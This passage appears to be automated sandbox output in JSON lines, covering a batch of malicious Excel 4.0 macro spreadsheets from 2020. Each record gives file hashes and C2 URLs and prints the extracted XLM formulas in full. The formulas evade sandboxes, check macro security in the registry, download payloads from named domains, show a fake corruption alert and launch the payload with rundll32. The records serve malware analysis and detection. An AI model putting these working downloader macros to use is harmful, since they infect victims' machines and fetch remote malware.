Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"rGoac2t5Eq\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a619dc30e5efead84d0db1c935071d60e36a0657de7e260c339128beb326b74d"},"analysis":{"reported":"2020-04-09T16:18:08Z","score":10},"files":[{"filename":"a619dc30e5efead84d0db1c935071d60e36a0657de7e260c339128beb326b74d","filesize":206336,"md5":"f91fb26e52ef272078f451c9032d2147","sha1":"0114474937b61451cc36c4a93b39c637266e1ee8","sha256":"a619dc30e5efead84d0db1c935071d60e36a0657de7e260c339128beb326b74d","sha512":"75a571116533eb68657053d414c532c3de9c65d6aef33bb469aa28c52377b22d51b73911f305c5790501094afd4474cb3a7f84e60aa76d8df5e185d6fdbb12ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a619dc30e5efead84d0db1c935071d60e36a0657de7e260c339128beb326b74d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hVVWyKXE4q\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a61a8d3cf8441cc2f676f3273821310187f521f03db2ee8a6c4a1e06033585c4"},"analysis":{"reported":"2020-04-09T16:18:09Z","score":10},"files":[{"filename":"a61a8d3cf8441cc2f676f3273821310187f521f03db2ee8a6c4a1e06033585c4","filesize":212992,"md5":"5b6268f1b8376de538b2f4ea6118f7a2","sha1":"a7a49306fd7b4c4decc87b4b39dfe0aeb8844fce","sha256":"a61a8d3cf8441cc2f676f3273821310187f521f03db2ee8a6c4a1e06033585c4","sha512":"6d7342f67224c98504210de3fa4bcf713087bb26b2e2e148b013121c4bef53270c796369073ad81ddb632a4a385ecab6f7f0df92e48679a54152c10c87f22853","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a61a8d3cf8441cc2f676f3273821310187f521f03db2ee8a6c4a1e06033585c4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YjmdWKRHqi\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a61b08bbc904b19454502f4e0771f2622981932e4058740510bedb3c7c00ba63"},"analysis":{"reported":"2020-04-09T16:18:09Z","score":10},"files":[{"filename":"a61b08bbc904b19454502f4e0771f2622981932e4058740510bedb3c7c00ba63","filesize":177152,"md5":"c14ac285ceea4c53466387cf1da57c72","sha1":"8941af61e93f55d8af5ecab1d8622bf7dedf53dc","sha256":"a61b08bbc904b19454502f4e0771f2622981932e4058740510bedb3c7c00ba63","sha512":"1fb3954dc42f32aa8ee2c4979902569e398023385177f414853943c02384b711f668f1c714cacebafc4235e027bae89607b586c2c148c96182499f279b7217b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a61b08bbc904b19454502f4e0771f2622981932e4058740510bedb3c7c00ba63.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1dHGUASx9T\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a622bbbe5ef632a9d99f85fb947ce6b99283b9c90ea93e0c45247713d8b99b46"},"analysis":{"reported":"2020-04-09T16:18:09Z","score":10},"files":[{"filename":"a622bbbe5ef632a9d99f85fb947ce6b99283b9c90ea93e0c45247713d8b99b46","filesize":185344,"md5":"c927180d9e84fb4426d408124653a95a","sha1":"27be67c82c01f95ceb9e153752db17e9cd86270d","sha256":"a622bbbe5ef632a9d99f85fb947ce6b99283b9c90ea93e0c45247713d8b99b46","sha512":"24f0b3c9c711fd2f578887345eb254bf43c0f97a23600975eb2c5f23797285cdfa29be1c11497ad1eaeb1962ecad35b2b7f2f86925cd67806500ee7006ccc12f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a622bbbe5ef632a9d99f85fb947ce6b99283b9c90ea93e0c45247713d8b99b46.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a62b25e25e7ff59e8f022007685eb945ac9a4aec9d6e33a08804772613f32d60"},"analysis":{"reported":"2020-04-09T16:18:09Z","score":10},"files":[{"filename":"a62b25e25e7ff59e8f022007685eb945ac9a4aec9d6e33a08804772613f32d60","filesize":152576,"md5":"0c573b6dac333529e3976ff6dcaa5916","sha1":"082772409b671b9f4ba035e3dc5954453a04cda8","sha256":"a62b25e25e7ff59e8f022007685eb945ac9a4aec9d6e33a08804772613f32d60","sha512":"9af230dd4839051a748ddbaa0fbd5bafba499943615478190e8a07435a11230e0a14a126b8ef3127c38aa43c7c75cf37dff27b50ef2d44027d361c71b0b99b88","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a62b25e25e7ff59e8f022007685eb945ac9a4aec9d6e33a08804772613f32d60.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1rYVxa8uZb\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a64d35aaf57576cfcf588c21729288a96e915d399e2293879f71a4b8c52a48c9"},"analysis":{"reported":"2020-04-09T16:18:09Z","score":10},"files":[{"filename":"a64d35aaf57576cfcf588c21729288a96e915d399e2293879f71a4b8c52a48c9","filesize":168448,"md5":"600f05bbee976d72b7b0c6b1053e3f9f","sha1":"027984e1d874f7b7bfb9a8e9514b5ac2c2368137","sha256":"a64d35aaf57576cfcf588c21729288a96e915d399e2293879f71a4b8c52a48c9","sha512":"8a6c738f6cc7a94d578b857e3523502033044c575976bd3e2033c4cfab7792b876270275bd8a082bce290861e88698d56229b2ae18a23b706c8f1b6a1bea122e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a64d35aaf57576cfcf588c21729288a96e915d399e2293879f71a4b8c52a48c9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4HaWGiJ669\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a657c2b3fa26108d825502c32df4df01be45c621e6f854f7cc26ed48ac796ccb"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a657c2b3fa26108d825502c32df4df01be45c621e6f854f7cc26ed48ac796ccb","filesize":228864,"md5":"35af3b8b03145da0571cccce4f0da477","sha1":"3097688f15a397e2aab2b54ae1c6e9302aa661fa","sha256":"a657c2b3fa26108d825502c32df4df01be45c621e6f854f7cc26ed48ac796ccb","sha512":"4f15923dd9d00ac1cca87b38c9e0f8246e3b665273a4584d8d0407cd6f0bb815dee95546954f2d06ca2fa38eb23bd10aacef9108c8ff61ce7e444bf6563a0100","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a657c2b3fa26108d825502c32df4df01be45c621e6f854f7cc26ed48ac796ccb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"chQQebet4L\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a65cdae8a4ede6b9de9e9e4e0b8246fbe5f5e5765aa0925973f882cdc815c822"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a65cdae8a4ede6b9de9e9e4e0b8246fbe5f5e5765aa0925973f882cdc815c822","filesize":129536,"md5":"e013e5abc6d0f948104cf6fad6a0a671","sha1":"99b3e6047f9618f65ffc6ee427547abb14e96429","sha256":"a65cdae8a4ede6b9de9e9e4e0b8246fbe5f5e5765aa0925973f882cdc815c822","sha512":"e4a9c84b0c23ed746b8c48e18383180aa78f838e7b31593522461d4e00e262ebc3221a66a483553627d5c7d193f341edc8300be1af80df4aa731f0b6c470583a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a65cdae8a4ede6b9de9e9e4e0b8246fbe5f5e5765aa0925973f882cdc815c822.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$64C$3,532500,122880)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a65f7f503c6bcc0cad9b82124d3a8c254401542fbfd9bbb8f833b6fab42e6147"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a65f7f503c6bcc0cad9b82124d3a8c254401542fbfd9bbb8f833b6fab42e6147","filesize":167936,"md5":"d72030dc8a7fa871237ac52f11576881","sha1":"f8d6bf39e907ba86602e893433a2a54269113a4a","sha256":"a65f7f503c6bcc0cad9b82124d3a8c254401542fbfd9bbb8f833b6fab42e6147","sha512":"58827d0d92281da2293a57543368caf0e375d1256ac10a6853760920703a605d8254f0e629c4882aad52abadbaaaa486c14ceceacd8bee189824cd31c0367f41","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a65f7f503c6bcc0cad9b82124d3a8c254401542fbfd9bbb8f833b6fab42e6147.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vjIndZ34Ei\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a662d873c1a3a65edd8005af7219e0cb14a65d0db7737bb25fc9231a9cf6a8da"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a662d873c1a3a65edd8005af7219e0cb14a65d0db7737bb25fc9231a9cf6a8da","filesize":185344,"md5":"51448533dd6b567ab2ca76b7ea66f6f5","sha1":"a4bb8c9ef78119c226e8665d38730903a9aee86c","sha256":"a662d873c1a3a65edd8005af7219e0cb14a65d0db7737bb25fc9231a9cf6a8da","sha512":"0aee4776aab26b043e61c6ebc6244c8d7d4bf9f5902bfe844a026291cd878a5eab711225aa29ffc75e7e8b0a0a261e6dc2ecd2a5a7d0cdd35a0c6c8fc61dfb04","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a662d873c1a3a65edd8005af7219e0cb14a65d0db7737bb25fc9231a9cf6a8da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a67688079092b0d926509162b1389aa7ae634e9bcf002921994cf7a2d8096ba3"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a67688079092b0d926509162b1389aa7ae634e9bcf002921994cf7a2d8096ba3","filesize":144384,"md5":"d6c6bf76b6bea4622bbe797de069becf","sha1":"5959b5c48607cb247e9d8c926130a51db14ca07d","sha256":"a67688079092b0d926509162b1389aa7ae634e9bcf002921994cf7a2d8096ba3","sha512":"80de1179820467c39e5ecbb52101cdda57b8ce71d81148a47fb593e3fdd64c08fcd135b124206833e6cb21af8ee507f99ec8978b3b3e49e858204efceb7d4ef6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a67688079092b0d926509162b1389aa7ae634e9bcf002921994cf7a2d8096ba3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"yOkEC9PVtJ\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a67779e8b657e251223c0da35d70119c51b5d54fbcc0d86da216058257b660bf"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a67779e8b657e251223c0da35d70119c51b5d54fbcc0d86da216058257b660bf","filesize":185344,"md5":"8d47fd4a851fed9ea07a4c7f07d82936","sha1":"aa6e7e25ece4bedbf4ca19f5aaaf454ba2fc2f43","sha256":"a67779e8b657e251223c0da35d70119c51b5d54fbcc0d86da216058257b660bf","sha512":"26745215e76106d00fd0bb2566ef290fdbe123d49f8300b83769dfc60b67c091785c59553b677a37f2b1b4c0adae0dd5b585d0b6d0f76fb4e696999e7b18ef4f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a67779e8b657e251223c0da35d70119c51b5d54fbcc0d86da216058257b660bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a686ec1245f1ee2ac957617a7c2d382b00f0ca8f2c704976660278bd813bf169"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a686ec1245f1ee2ac957617a7c2d382b00f0ca8f2c704976660278bd813bf169","filesize":185344,"md5":"7490d05d11d37f6d303e568d1e6b061f","sha1":"cc0c45cef0127d833059c0b52c556e18ce062332","sha256":"a686ec1245f1ee2ac957617a7c2d382b00f0ca8f2c704976660278bd813bf169","sha512":"098481af2805a97b38a15ccd1303fec61910e15fa24f050e4e23d60d7bc1ad537d85a571b6f808bd48a9062c38b5de434e0fe9784205a8aa8c24fff75648d302","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a686ec1245f1ee2ac957617a7c2d382b00f0ca8f2c704976660278bd813bf169.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a68ba761db828605f40c78063f56b49de574cd65c38fed7e6a565bc4bb617bf6"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a68ba761db828605f40c78063f56b49de574cd65c38fed7e6a565bc4bb617bf6","filesize":206336,"md5":"59b8ddaf2e3370807d2df029e5b348f3","sha1":"c396408a089d3e64391c0085eb6a3fc69d973bc0","sha256":"a68ba761db828605f40c78063f56b49de574cd65c38fed7e6a565bc4bb617bf6","sha512":"91f479f53e487ddba515f73771fbc1616c8068902656efe6e6fb1ad83994554292bce43cc05600040136436a0313eda5d54771f8c901b6b7d242ee172ffb271f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a68ba761db828605f40c78063f56b49de574cd65c38fed7e6a565bc4bb617bf6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yNE5mMMRfT\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a69053f5320b88b32c87b67b8e1b305ece09dfe642b73fc4c647688f39998a08"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a69053f5320b88b32c87b67b8e1b305ece09dfe642b73fc4c647688f39998a08","filesize":112128,"md5":"36d1b6c863a9b5097afada683c3c0ad7","sha1":"b5e5cab9b7dc0f05e79f42d89a9ce44f310d4513","sha256":"a69053f5320b88b32c87b67b8e1b305ece09dfe642b73fc4c647688f39998a08","sha512":"34042bbf9103c8570957435f2524f1883068f07e8550cd4ead9f666fae59b4a26854a474890755a3a92477c7633cff9cac35acb333a504eb435959f9ba20c37f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a69053f5320b88b32c87b67b8e1b305ece09dfe642b73fc4c647688f39998a08.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a6ca9b574269f9bff9ec8cf39f5074550390ff099a3e3f462188a0a09234ce36"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a6ca9b574269f9bff9ec8cf39f5074550390ff099a3e3f462188a0a09234ce36","filesize":160768,"md5":"ea0e2ad6809c2d5cb36193a709e90181","sha1":"125571bf1225536b9e9bf2e8741609576b59fe30","sha256":"a6ca9b574269f9bff9ec8cf39f5074550390ff099a3e3f462188a0a09234ce36","sha512":"58c167ed812cfc570e0bef65602c92f6e4dd269d7e881127a3375a58382ead56c5baf3a7c972174a3345cd74f62ad2cfff15d53396273bf953db87bc9f0eb215","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a6ca9b574269f9bff9ec8cf39f5074550390ff099a3e3f462188a0a09234ce36.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 